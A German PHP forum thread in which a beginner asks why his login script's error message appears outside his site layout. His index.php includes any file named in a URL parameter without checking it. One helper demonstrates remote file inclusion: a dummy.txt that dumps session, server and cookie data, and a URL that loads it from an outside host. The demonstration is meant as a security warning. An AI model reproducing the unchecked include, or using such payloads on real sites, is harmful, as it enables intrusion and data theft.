Login mrhappiness - Macht immer neue Seite

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Login mrhappiness - Macht immer neue Seite

    Hi,
    hier mal der Aufbau meiner Seite.
    Habe index.php wo einzelne php Dateien eingeladen werden. Ich habe nun das Script von mrhappiness verwendet und auf meiner Hauptseite includet. Soweit funzt alles super. Wenn ich nun aber Daten zum Login eingebe (z.B. inkorrekte Daten), dann macht er mir immer eine neue Seite und schreibt dort hin: "Ihre Anmeldedaten waren nicht korrekt" Ich will aber dass er es genau an die Stelle von der index.php schreibt wo ich die anderen php Dateien auch eingebunden habe, um meine Sitestruktur zu erhalten.

    Ihr könnt euch das ja mal ansehen:
    http://mitglied.lycos.de/konzumi/backes
    und dann auf intern klicken und irgendwas eingeben - es öffnet sich eine weisse seite und genau das will ich nicht!

    In der Index php habe ich das so gemacht:
    PHP-Code:
    <?
    if ($aktuell=="" or !isset($aktuell)) {
    $aktuell="news.php";
    }
    include ($aktuell);
    ?>
    Kann mir einer sagen, wie ich das hinbekomme, dass die meldung vom login System in meiner Sitestruktur bleibt.

    Vielen Danke schonmal an alle die sich Gedanken machen
    Flashtuts - Flash Tutorials und Downloads für alle Versionen
    psdtuts - Photoshop Tutorials, Galerie, Battles

  • #2
    dein form geht auf login.php. also was hast du denn in login.php stehen?
    INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


    Kommentar


    • #3
      PHP-Code:
      <? 
      session_start(); 
      include 'sessionhelpers.inc.php'; 
      if (isset($_POST['login'])) 

          $userid=check_user($_POST['username'], $_POST['userpass']); 
          if ($userid!=false) 
              login($userid); 
          else 
              echo 'Ihre Anmeldedaten waren nicht korrekt!'; 

      if (!logged_in()) 
          echo '<form method="post" action="login.php"> 
              <label>Benutzername:</label><input name="username" type="text"><br> 
              <label>Passwort: </label><input name="userpass" type="password" id="userpass"><br> 
              <input name="login" type="submit" id="login" value="Einloggen"> 
          </form>'; 
      else 
      echo '<a href="index.php?aktuell=admin_news.php">News schreiben</a><br>';
          echo '<a href="index.php?aktuell=logout.php">Ausloggen</a>'; 
      echo '<p /><a href="index.php?aktuell=logged_in.php">Check</a>'; 
      ?>
      Flashtuts - Flash Tutorials und Downloads für alle Versionen
      psdtuts - Photoshop Tutorials, Galerie, Battles

      Kommentar


      • #4
        das ist alles?

        und dann wunderst du dich, dass dein layout nicht da ist?
        INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


        Kommentar


        • #5
          2 Frage für zwischendurch:
          Wenn ich auf der Seite die nach dem Login aufgerufen wird, den Username mit dem man sich erfolgreich eingelogged hat, ausgeben will, wie muss ich den Username per echo Befehl ansprechen, auch wieder in Bezug auf das Login Script von mrhappiness.
          Flashtuts - Flash Tutorials und Downloads für alle Versionen
          psdtuts - Photoshop Tutorials, Galerie, Battles

          Kommentar


          • #6
            das ist alles?

            und dann wunderst du dich, dass dein layout nicht da ist?
            Das versteh ich nicht ganz sry. Ich include doch die login.php in mein Layout. Es geht halt nur darum, dass der Text der nach der Eingabe erscheint auch wieder im Layout ist.

            Bin noch recht newbie in php aber ich hoffe du kannst mir dennoch helfen
            Flashtuts - Flash Tutorials und Downloads für alle Versionen
            psdtuts - Photoshop Tutorials, Galerie, Battles

            Kommentar


            • #7
              soviel ich weiss, werden die daten in der session gespeichert.

              also musst du entsprechend $_SESSION['username'] nehmen. wobei username an sich jetzt nicht 100%ig richtig sein muss.

              ach noch was zu deinem layout ... evtl ist es besser, wenn du auf die index.php linkst, statt auf die login.php. als hidden-field mit dem namen 'aktuell' kannst du ja z.b. 'login.php' übergeben.

              aber im grund rate ich dir, dich mal etwas (mehr) mit sicherheit zu beschäftigen. so wie ich das sehe, wirst du so mehr oder weniger (aber eher mehr) problem bekommen.
              INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


              Kommentar


              • #8
                Original geschrieben von konSumi
                Das versteh ich nicht ganz sry. Ich include doch die login.php in mein Layout. Es geht halt nur darum, dass der Text der nach der Eingabe erscheint auch wieder im Layout ist.
                dann musst da dafür sorgen, dass es so ist. ein beispiel habe ich dir eben gepostet..... ^^

                Original geschrieben von konSumi
                Bin noch recht newbie in php aber ich hoffe du kannst mir dennoch helfen
                das ist keine entschuldigung. hilfe bekommt hier jeder, der sich auch mit der materie auseinander setzt.
                INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


                Kommentar


                • #9
                  Original geschrieben von konSumi
                  Das versteh ich nicht ganz sry. Ich include doch die login.php in mein Layout.
                  nein.

                  das ziel deines formulares ist mit action="login.php" angegeben.

                  sollte doch wohl logisch sein, dass dann auch nur dieses script aufgerufen wird, ohne irgendwo eingebunden zu werden.
                  I don't believe in rebirth. Actually, I never did in my whole lives.

                  Kommentar


                  • #10
                    Alles klar, ich danke euch beiden ihr habt mir sehr geholfen, hab nun:
                    PHP-Code:
                    echo '<form method="post" action="index.php?aktuell=login.php"> 
                    und es funktioniert bisher alles, wenn ich das recht überblicken konnte.

                    Nochmal zu dir Abraxax. Ich habe nun schon mehrmals gehört, das mit der Sicherheit, worauf soll ich da genau achten, und was ist bei mir nicht sicher, oder muss ich anders machen? Kannst du mir da evtl Links zu geben und hinweise, was ich zu beachten habe. Das ist mein erstes richtiges Projekt in php also versuche ich viel dazu zu lernen und das schaffe ich hoffentlich dank euch.

                    THX
                    Flashtuts - Flash Tutorials und Downloads für alle Versionen
                    psdtuts - Photoshop Tutorials, Galerie, Battles

                    Kommentar


                    • #11
                      nehmen wir eine datei namens dummy.txt mit folgendem inhalt.
                      PHP-Code:
                      <?php

                      show_source
                      ($_SERVER['PHP_SELF']);

                      print_r($_SESSION);
                      print_r($_SERVER);
                      print_r($_GET);
                      print_r($_POST);
                      print_r($_COOKIE);

                      ?>
                      die dummy.txt befindet sich mal angenommen hier
                      -> http://www.inter.net/dummy.txt

                      nun rufe ich eine seite von dir auf. und zwar so ....
                      -> http://mitglied.lycos.de/konzumi/backes/index.php?aktuell=http://www.inter.net/dummy.txt

                      was passiert?


                      hier wird wohl tripod einen riegel vorgeschoben haben. aber möglich wäre sowas. denn in deinem code prüfst du z.b. nicht weiter ab. oder?
                      INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


                      Kommentar


                      • #12
                        deine dummy.txt wird in meine Seite eingebunden und aufgerufen?
                        Flashtuts - Flash Tutorials und Downloads für alle Versionen
                        psdtuts - Photoshop Tutorials, Galerie, Battles

                        Kommentar


                        • #13
                          probier es aus....
                          INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


                          Kommentar


                          • #14
                            passiert irgendwie nichts, was möchtest du mir denn damit sagen, ich versteh dich nicht so ganz
                            Flashtuts - Flash Tutorials und Downloads für alle Versionen
                            psdtuts - Photoshop Tutorials, Galerie, Battles

                            Kommentar


                            • #15
                              klar passiert bei tripod nichts. lade dir mal www.apachefriends.de und teste es mal damit. evtl musst du mal externes includen aktivieren, damit du siehst, was ich meine.
                              INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


                              Kommentar

                              Lädt...
                              X